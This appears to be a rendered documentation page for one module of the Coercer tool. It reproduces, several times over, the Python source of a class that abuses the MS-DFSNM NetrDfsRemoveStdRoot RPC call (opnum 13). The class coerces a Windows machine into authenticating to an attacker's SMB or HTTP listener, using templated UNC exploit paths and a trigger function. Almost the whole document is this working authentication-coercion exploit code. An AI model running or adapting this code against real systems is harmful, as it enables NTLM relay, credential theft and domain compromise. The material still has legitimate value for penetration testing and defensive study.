coercer.methods.MS_DFSNM.NetrDfsRemoveStdRoot
1#!/usr/bin/env python3 2# -*- coding: utf-8 -*- 3# File name : NetrDfsRemoveStdRootResponse.py 4# Author : Podalirius (@podalirius_) 5# Date created : 14 Sep 2022 6 7from coercer.models.MSPROTOCOLRPCCALL import MSPROTOCOLRPCCALL 8from coercer.network.DCERPCSessionError import DCERPCSessionError 9from coercer.core.utils import gen_random_name 10from impacket.dcerpc.v5.ndr import NDRCALL, NDRSTRUCT 11from impacket.dcerpc.v5.dtypes import UUID, ULONG, WSTR, DWORD, LONG, NULL, BOOL, UCHAR, PCHAR, RPC_SID, LPWSTR, GUID 12 13 14class _NetrDfsRemoveStdRoot(NDRCALL): 15 """ 16 Structure to make the RPC call to NetrDfsRemoveStdRoot() in MS-DFSNM Protocol 17 """ 18 opnum = 13 19 structure = ( 20 ('ServerName', WSTR), # Type: WCHAR * 21 ('RootShare', WSTR), # Type: WCHAR * 22 ('ApiFlags', DWORD) # Type: DWORD 23 ) 24 25 26class _NetrDfsRemoveStdRootResponse(NDRCALL): 27 """ 28 Structure to parse the response of the RPC call to NetrDfsRemoveStdRoot() in MS-DFSNM Protocol 29 """ 30 structure = () 31 32 33class NetrDfsRemoveStdRoot(MSPROTOCOLRPCCALL): 34 """ 35 Coercing a machine to authenticate using function NetrDfsRemoveStdRoot (opnum 13) of [MS-DFSNM]: Distributed File System (DFS): Namespace Management Protocol (https://docs.microsoft.com/en-us/openspecs/windows_protocols/ms-dfsnm/95a506a8-cae6-4c42-b19d-9c1ed1223979) 36 37 Method found by: 38 - [@filip_dragovic](https://twitter.com/filip_dragovic) 39 """ 40 41 exploit_paths = [ 42 ("smb", '\\\\{{listener}}{{smb_listen_port}}\\{{rnd(8)}}\\file.txt\x00'), 43 ("smb", '\\\\{{listener}}{{smb_listen_port}}\\{{rnd(8)}}\\\x00'), 44 ("smb", '\\\\{{listener}}{{smb_listen_port}}\\{{rnd(8)}}\x00'), 45 ("http", '\\\\{{listener}}{{http_listen_port}}/{{rnd(3)}}\\file.txt\x00'), 46 ] 47 48 access = { 49 "ncan_np": [ 50 { 51 "namedpipe": r"\PIPE\netdfs", 52 "uuid": "4fc742e0-4a10-11cf-8273-00aa004ae673", 53 "version": "3.0" 54 } 55 ], 56 "ncacn_ip_tcp": [ 57 { 58 "uuid": "4fc742e0-4a10-11cf-8273-00aa004ae673", 59 "version": "3.0" 60 } 61 ] 62 } 63 64 protocol = { 65 "longname": "[MS-DFSNM]: Distributed File System (DFS): Namespace Management Protocol", 66 "shortname": "MS-DFSNM" 67 } 68 69 function = { 70 "name": "NetrDfsRemoveStdRoot", 71 "opnum": 13, 72 "vulnerable_arguments": ["ServerName"] 73 } 74 75 def trigger(self, dcerpc_session, target): 76 if dcerpc_session is not None: 77 try: 78 request = _NetrDfsRemoveStdRoot() 79 request['ServerName'] = self.path 80 request['RootShare'] = gen_random_name() + '\x00' 81 request['ApiFlags'] = 0 82 resp = dcerpc_session.request(request) 83 return "" 84 except Exception as err: 85 return err 86 else: 87 print("[!] Error: dce is None, you must call connect() first.") 88 return None
34class NetrDfsRemoveStdRoot(MSPROTOCOLRPCCALL): 35 """ 36 Coercing a machine to authenticate using function NetrDfsRemoveStdRoot (opnum 13) of [MS-DFSNM]: Distributed File System (DFS): Namespace Management Protocol (https://docs.microsoft.com/en-us/openspecs/windows_protocols/ms-dfsnm/95a506a8-cae6-4c42-b19d-9c1ed1223979) 37 38 Method found by: 39 - [@filip_dragovic](https://twitter.com/filip_dragovic) 40 """ 41 42 exploit_paths = [ 43 ("smb", '\\\\{{listener}}{{smb_listen_port}}\\{{rnd(8)}}\\file.txt\x00'), 44 ("smb", '\\\\{{listener}}{{smb_listen_port}}\\{{rnd(8)}}\\\x00'), 45 ("smb", '\\\\{{listener}}{{smb_listen_port}}\\{{rnd(8)}}\x00'), 46 ("http", '\\\\{{listener}}{{http_listen_port}}/{{rnd(3)}}\\file.txt\x00'), 47 ] 48 49 access = { 50 "ncan_np": [ 51 { 52 "namedpipe": r"\PIPE\netdfs", 53 "uuid": "4fc742e0-4a10-11cf-8273-00aa004ae673", 54 "version": "3.0" 55 } 56 ], 57 "ncacn_ip_tcp": [ 58 { 59 "uuid": "4fc742e0-4a10-11cf-8273-00aa004ae673", 60 "version": "3.0" 61 } 62 ] 63 } 64 65 protocol = { 66 "longname": "[MS-DFSNM]: Distributed File System (DFS): Namespace Management Protocol", 67 "shortname": "MS-DFSNM" 68 } 69 70 function = { 71 "name": "NetrDfsRemoveStdRoot", 72 "opnum": 13, 73 "vulnerable_arguments": ["ServerName"] 74 } 75 76 def trigger(self, dcerpc_session, target): 77 if dcerpc_session is not None: 78 try: 79 request = _NetrDfsRemoveStdRoot() 80 request['ServerName'] = self.path 81 request['RootShare'] = gen_random_name() + '\x00' 82 request['ApiFlags'] = 0 83 resp = dcerpc_session.request(request) 84 return "" 85 except Exception as err: 86 return err 87 else: 88 print("[!] Error: dce is None, you must call connect() first.") 89 return None
Coercing a machine to authenticate using function NetrDfsRemoveStdRoot (opnum 13) of [MS-DFSNM]: Distributed File System (DFS): Namespace Management Protocol (https://docs.microsoft.com/en-us/openspecs/windows_protocols/ms-dfsnm/95a506a8-cae6-4c42-b19d-9c1ed1223979)
Method found by:
exploit_paths =
[('smb', '\\\\{{listener}}{{smb_listen_port}}\\{{rnd(8)}}\\file.txt\x00'), ('smb', '\\\\{{listener}}{{smb_listen_port}}\\{{rnd(8)}}\\\x00'), ('smb', '\\\\{{listener}}{{smb_listen_port}}\\{{rnd(8)}}\x00'), ('http', '\\\\{{listener}}{{http_listen_port}}/{{rnd(3)}}\\file.txt\x00')]
access =
{'ncan_np': [{'namedpipe': '\\PIPE\\netdfs', 'uuid': '4fc742e0-4a10-11cf-8273-00aa004ae673', 'version': '3.0'}], 'ncacn_ip_tcp': [{'uuid': '4fc742e0-4a10-11cf-8273-00aa004ae673', 'version': '3.0'}]}
protocol =
{'longname': '[MS-DFSNM]: Distributed File System (DFS): Namespace Management Protocol', 'shortname': 'MS-DFSNM'}
def
trigger(self, dcerpc_session, target):
76 def trigger(self, dcerpc_session, target): 77 if dcerpc_session is not None: 78 try: 79 request = _NetrDfsRemoveStdRoot() 80 request['ServerName'] = self.path 81 request['RootShare'] = gen_random_name() + '\x00' 82 request['ApiFlags'] = 0 83 resp = dcerpc_session.request(request) 84 return "" 85 except Exception as err: 86 return err 87 else: 88 print("[!] Error: dce is None, you must call connect() first.") 89 return None